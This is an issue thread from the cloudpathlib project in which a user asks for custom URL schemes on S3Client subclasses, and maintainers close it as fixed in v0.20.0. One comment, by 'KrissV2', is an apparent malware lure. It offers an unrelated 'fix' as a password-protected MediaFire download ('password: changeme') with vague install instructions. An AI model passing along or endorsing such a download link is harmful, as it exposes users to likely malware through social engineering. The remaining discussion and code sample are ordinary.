### ISSUE TITLE
Allow subclasses of S3Client, etc to set a custom scheme

### ISSUE THREAD

**Issue by kujenga** [drivendataorg/cloudpathlib#466]
Currently, the guidance for accessing S3 compatible stores recommends continuing to use the S3 scheme in the path: https://cloudpathlib.drivendata.org/stable/authentication/#accessing-custom-s3-compatible-object-stores

I'd like to be able to take this a step further and customize the URL scheme. The following currently runs into an issue as `cloud_prefix` is not available on the client implementations, which instead hard-code their scheme.

```python
@register_path_class("mys3")
class MyS3Path(S3Path):

    cloud_prefix: str = "mys3://"


@register_client_class("mys3")
class MyS3Client(S3Client):

    cloud_prefix: str = "mys3://"
```

The idea here is to allow the schemes to be customized in a similar way to how the Path implementations work: https://github.com/drivendataorg/cloudpathlib/blob/b776bee3a6cdbb5877cd6eb8be823af0d0456e0c/cloudpathlib/s3/s3path.py#L28

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by pjbull** [comment]
Closing as done in #467

**Comment by pjbull** [comment]
@kujenga Just released v0.20.0 to PyPI, which includes #467. Take it for a spin!
